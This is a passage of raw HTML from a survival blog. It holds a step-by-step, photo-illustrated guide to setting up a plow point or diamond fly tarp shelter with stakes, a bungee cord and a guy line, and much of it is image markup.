data-attachment-id="3284" data-permalink="https://sensiblesurvival.org/2017/11/06/other-set-ups-for-the-plow-point-tarp/a07/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/11/a07.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1509190172&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;125&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="a07" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/11/a07.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/11/a07.jpg?w=497" class="aligncenter size-large wp-image-3284" src="https://sensiblesurvival.files.wordpress.com/2017/11/a07.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2017/11/a07.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2017/11/a07.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2017/11/a07.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2017/11/a07.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2017/11/a07.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p><a href="https://sensiblesurvival.org/2017/11/06/other-set-ups-for-the-plow-point-tarp/a01/" rel="attachment wp-att-3278"><img data-attachment-id="3278" data-permalink="https://sensiblesurvival.org/2017/11/06/other-set-ups-for-the-plow-point-tarp/a01/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/11/a01.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1509190243&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.0125&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="a01" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/11/a01.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/11/a01.jpg?w=497" class="aligncenter size-large wp-image-3278" src="https://sensiblesurvival.files.wordpress.com/2017/11/a01.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2017/11/a01.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2017/11/a01.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2017/11/a01.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2017/11/a01.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2017/11/a01.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> </div><!--end entry--> <div class="post-footer"> <div class="comments"> <a href="https://sensiblesurvival.org/2017/11/06/other-set-ups-for-the-plow-point-tarp/#comments">1 Comment</a> </div><!-- .comments --> </div><!--end post footer--> </div><!--end post--> <div id="post-3255" class="post-3255 post type-post status-publish format-standard hentry category-bug-out-bags-and-survival-kits tag-bug-out-shelter tag-bugout-tarp tag-diamond-fly-tarp tag-plow-point-tarp tag-quick-tarp-set-up tag-setting-up-a-tarp tag-survival-shelter tag-survival-tarp"> <div class="post-header"> <div class="date"><a href="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/">October 6, 2017</a></div> <h2><a href="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/" rel="bookmark" title="Permanent Link to The Plow Point or Diamond Fly Tarp&nbsp;Set-Up">The Plow Point or Diamond Fly Tarp&nbsp;Set-Up</a></h2> <div class="author"> </div> </div><!--end post header--> <div class="entry clear"> <p>I started using this particular tarp set-up years ago.  At the time everyone I knew called it a diamond fly.  Today the term plow point seems to be more popular, but which ever name it goes by this is definitely one of the quickest and easiest set-ups that you can use.  If you tie off the front of the tarp to a tree you can create a good, rain proof shelter in ten minutes or less.  If you don’t have a convenient tree to use it may take a few minutes more.</p> <p>Here’s the equipment you will need from your shelter kit:</p> <p>You will, of course need your tarp.</p> <p>You will need one of your small, pre-made loops and your bungee cord</p> <p>You will also need one long stake and six short stakes.</p> <p>Lastly, you will need a couple of your six foot long guy ropes and one of the little two inch sticks.</p> <p>Now let’s set up our diamond fly:</p> <p>First lay out your tarp as pictured below.  It’s best if you can find a location with one tree at the front of the tarp and another tree at the back.  In this case the front of the tarp will be attached to the tree on the left.<a href="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/02-23/" rel="attachment wp-att-3256"><img data-attachment-id="3256" data-permalink="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/02-23/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/10/02.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1502791410&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;250&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="02" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/10/02.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/10/02.jpg?w=497" class="aligncenter size-large wp-image-3256" src="https://sensiblesurvival.files.wordpress.com/2017/10/02.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2017/10/02.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2017/10/02.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2017/10/02.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2017/10/02.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2017/10/02.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Next, attach your small loop to the front corner of the tarp.<a href="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/03-25/" rel="attachment wp-att-3257"><img data-attachment-id="3257" data-permalink="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/03-25/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/10/03.jpg" data-orig-size="2592,1944" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1502791498&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;160&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="03" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/10/03.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/10/03.jpg?w=497" class="aligncenter size-large wp-image-3257" src="https://sensiblesurvival.files.wordpress.com/2017/10/03.jpg?w=497&#038;h=373" alt="" width="497" height="373" srcset="https://sensiblesurvival.files.wordpress.com/2017/10/03.jpg?w=497&amp;h=373 497w, https://sensiblesurvival.files.wordpress.com/2017/10/03.jpg?w=994&amp;h=746 994w, https://sensiblesurvival.files.wordpress.com/2017/10/03.jpg?w=150&amp;h=113 150w, https://sensiblesurvival.files.wordpress.com/2017/10/03.jpg?w=300&amp;h=225 300w, https://sensiblesurvival.files.wordpress.com/2017/10/03.jpg?w=768&amp;h=576 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Use your bungee cord to attach the front of the tarp to the tree.  You can vary the height according to conditions, but I usually set the front at about chest height.<a href="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/04-21/" rel="attachment wp-att-3258"><img data-attachment-id="3258" data-permalink="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/04-21/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/10/04.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1502791588&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;160&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="04" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/10/04.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/10/04.jpg?w=497" class="aligncenter size-large wp-image-3258" src="https://sensiblesurvival.files.wordpress.com/2017/10/04.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2017/10/04.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2017/10/04.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2017/10/04.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2017/10/04.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2017/10/04.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Grab the back corner of the tarp and pull it back toward the back tree.  Use your long stake to stake the tarp down good and tight so that you have a nice diagonal ridge line.<a href="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/05-21/" rel="attachment wp-att-3259"><img data-attachment-id="3259" data-permalink="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/05-21/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/10/05.jpg" data-orig-size="2592,1944" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1502791772&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;250&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="05" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/10/05.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/10/05.jpg?w=497" class="aligncenter size-large wp-image-3259" src="https://sensiblesurvival.files.wordpress.com/2017/10/05.jpg?w=497&#038;h=373" alt="" width="497" height="373" srcset="https://sensiblesurvival.files.wordpress.com/2017/10/05.jpg?w=497&amp;h=373 497w, https://sensiblesurvival.files.wordpress.com/2017/10/05.jpg?w=994&amp;h=746 994w, https://sensiblesurvival.files.wordpress.com/2017/10/05.jpg?w=150&amp;h=113 150w, https://sensiblesurvival.files.wordpress.com/2017/10/05.jpg?w=300&amp;h=225 300w, https://sensiblesurvival.files.wordpress.com/2017/10/05.jpg?w=768&amp;h=576 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p><a href="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/06-21/" rel="attachment wp-att-3260"><img data-attachment-id="3260" data-permalink="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/06-21/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/10/06.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1502791750&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;250&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="06" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/10/06.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/10/06.jpg?w=497" class="aligncenter size-large wp-image-3260" src="https://sensiblesurvival.files.wordpress.com/2017/10/06.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2017/10/06.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2017/10/06.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2017/10/06.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2017/10/06.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2017/10/06.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Use your six short stakes to stake out first one side of the tarp and then the other.  You want to pull the sides out as far as you can without making the ridge line start to sag.<a href="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/07-20/" rel="attachment wp-att-3261"><img data-attachment-id="3261" data-permalink="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/07-20/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/10/07.jpg" data-orig-size="2592,1944" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1502791874&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="07" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/10/07.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/10/07.jpg?w=497" class="aligncenter size-large wp-image-3261" src="https://sensiblesurvival.files.wordpress.com/2017/10/07.jpg?w=497&#038;h=373" alt="" width="497" height="373" srcset="https://sensiblesurvival.files.wordpress.com/2017/10/07.jpg?w=497&amp;h=373 497w, https://sensiblesurvival.files.wordpress.com/2017/10/07.jpg?w=994&amp;h=746 994w, https://sensiblesurvival.files.wordpress.com/2017/10/07.jpg?w=150&amp;h=113 150w, https://sensiblesurvival.files.wordpress.com/2017/10/07.jpg?w=300&amp;h=225 300w, https://sensiblesurvival.files.wordpress.com/2017/10/07.jpg?w=768&amp;h=576 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p><a href="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/08-20/" rel="attachment wp-att-3262"><img data-attachment-id="3262" data-permalink="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/08-20/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/10/08.jpg" data-orig-size="2592,1944" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1502791922&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.02&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="08" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/10/08.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/10/08.jpg?w=497" class="aligncenter size-large wp-image-3262" src="https://sensiblesurvival.files.wordpress.com/2017/10/08.jpg?w=497&#038;h=373" alt="" width="497" height="373" srcset="https://sensiblesurvival.files.wordpress.com/2017/10/08.jpg?w=497&amp;h=373 497w, https://sensiblesurvival.files.wordpress.com/2017/10/08.jpg?w=994&amp;h=746 994w, https://sensiblesurvival.files.wordpress.com/2017/10/08.jpg?w=150&amp;h=113 150w, https://sensiblesurvival.files.wordpress.com/2017/10/08.jpg?w=300&amp;h=225 300w, https://sensiblesurvival.files.wordpress.com/2017/10/08.jpg?w=768&amp;h=576 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p><a href="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/09-18/" rel="attachment wp-att-3263"><img data-attachment-id="3263" data-permalink="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/09-18/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/10/09.jpg" data-orig-size="2592,1944" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1502792005&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.016666666666667&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="09" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/10/09.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/10/09.jpg?w=497" class="aligncenter size-large wp-image-3263" src="https://sensiblesurvival.files.wordpress.com/2017/10/09.jpg?w=497&#038;h=373" alt="" width="497" height="373" srcset="https://sensiblesurvival.files.wordpress.com/2017/10/09.jpg?w=497&amp;h=373 497w, https://sensiblesurvival.files.wordpress.com/2017/10/09.jpg?w=994&amp;h=746 994w, https://sensiblesurvival.files.wordpress.com/2017/10/09.jpg?w=150&amp;h=113 150w, https://sensiblesurvival.files.wordpress.com/2017/10/09.jpg?w=300&amp;h=225 300w, https://sensiblesurvival.files.wordpress.com/2017/10/09.jpg?w=768&amp;h=576 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>You could stop at this point and call it home, but it only takes a minute to make your set-up a little better. What we’re going to do is attach a guy line between the center loop of the tarp and the back tree.  This will pull the ridge line up a little bit and keep it from sagging down in the middle.  If it’s very far to the back tree you may need to tie two guy lines together to make a long cord. Here’s how you set up the guy line:</p> <p>Attach one end of the guy line to the tarp’s center loop as pictured below.<a href="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/10-15/" rel="attachment wp-att-3264"><img data-attachment-id="3264" data-permalink="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/10-15/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/10/10.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1502792136&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;320&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="10" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/10/10.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/10/10.jpg?w=497" class="aligncenter size-large wp-image-3264" src="https://sensiblesurvival.files.wordpress.com/2017/10/10.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2017/10/10.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2017/10/10.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2017/10/10.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2017/10/10.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2017/10/10.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p><a href="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/11-14/" rel="attachment wp-att-3265"><img data-attachment-id="3265" data-permalink="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/11-14/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/10/11.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1502792165&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;250&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="11" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/10/11.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/10/11.jpg?w=497" class="aligncenter size-large wp-image-3265" src="https://sensiblesurvival.files.wordpress.com/2017/10/11.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2017/10/11.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2017/10/11.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2017/10/11.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2017/10/11.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2017/10/11.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Pull the other end of the guy line back to the back tree and wrap it around the tree a couple of feet higher than your bungee cord is attached to the front tree.  Tie the guy line off using the simple quick release knot pictured below.  Notice that the small stick is inserted into the finished loop to prevent accidentally untying the knot.<a href="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/12-13/" rel="attachment wp-att-3266"><img data-attachment-id="3266" data-permalink="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/12-13/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/10/12.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1502792300&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;250&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="12" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/10/12.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/10/12.jpg?w=497" class="aligncenter size-large wp-image-3266" src="https://sensiblesurvival.files.wordpress.com/2017/10/12.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2017/10/12.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2017/10/12.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2017/10/12.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2017/10/12.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2017/10/12.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p><a href="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/13-14/" rel="attachment wp-att-3267"><img data-attachment-id="3267" data-permalink="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/13-14/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/10/13.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1502792331&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;250&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="13" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/10/13.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/10/13.jpg?w=497" class="aligncenter size-large wp-image-3267" src="https://sensiblesurvival.files.wordpress.com/2017/10/13.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2017/10/13.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2017/10/13.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2017/10/13.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2017/10/13.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2017/10/13.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p><a href="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/14-13/" rel="attachment wp-att-3268"><img data-attachment-id="3268" data-permalink="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/14-13/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/10/14.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1502793249&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;160&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="14" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2017/10/14.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2017/10/14.jpg?w=497" class="aligncenter size-large wp-image-3268" src="https://sensiblesurvival.files.wordpress.com/2017/10/14.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2017/10/14.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2017/10/14.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2017/10/14.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2017/10/14.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2017/10/14.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p><a href="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/15-12/" rel="attachment wp-att-3269"><img data-attachment-id="3269" data-permalink="https://sensiblesurvival.org/2017/10/06/the-plow-point-or-diamond-fly-tarp-set-up/15-12/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2017/10/15.jpg" data-orig-size="2592,1936" data-comments-opened="1" 